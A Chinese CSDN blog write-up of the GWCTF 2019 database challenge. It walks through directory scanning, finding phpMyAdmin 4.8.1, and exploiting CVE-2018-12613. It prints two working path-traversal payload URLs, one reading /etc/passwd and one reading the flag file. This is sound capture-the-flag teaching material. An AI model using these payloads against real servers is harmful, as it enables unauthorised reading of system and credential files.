[GWCTF 2019]我有一个数据库(特详解)

本文讲述了如何处理页面乱码问题,通过火狐修复文字编码,以及发现PHPMyAdmin4.8.1版本的任意文件读取漏洞(CVE-2018-12613)的过程,介绍了利用payload获取敏感信息的方法,最终涉及到了flag获取。
摘要由CSDN通过智能技术生成

页面一开始乱码,先教大家应该修复的方法,到火狐打开,然后找到小工具里的修复文字编码,就可以了(没有的话可以在定制工具栏里添加)

image-20240131174304889

一般页面读取乱码都可以这样解决

image-20240131174515957

他说什么都没有,先dirsearch扫一下

image-20240131174605840

先看看robots.txt里又啥

image-20240131174717565

查看phpinfo.php看看

image-20240131175206943

查看其他的吧,有个数据库看看去

image-20240131175139209

在界面可以查到各服务器的版本,可以去百度各版本服务器的漏洞

image-20240131181617698

这里就不一样查了,直接上结论

查询到4.8.1版本存在任意文件读取漏洞:phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)

直接看上面那个师傅的文章,十分详细的

接下来就是利用文章里的payload了,这里../回到上一级目录,只要多于5个,能回到根目录就行,etc/passwd是linux存放用户和密码的文件,在根目录

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

image-20240131182341538

接下来就是flag了

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../flag

image-20240131182441692

  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值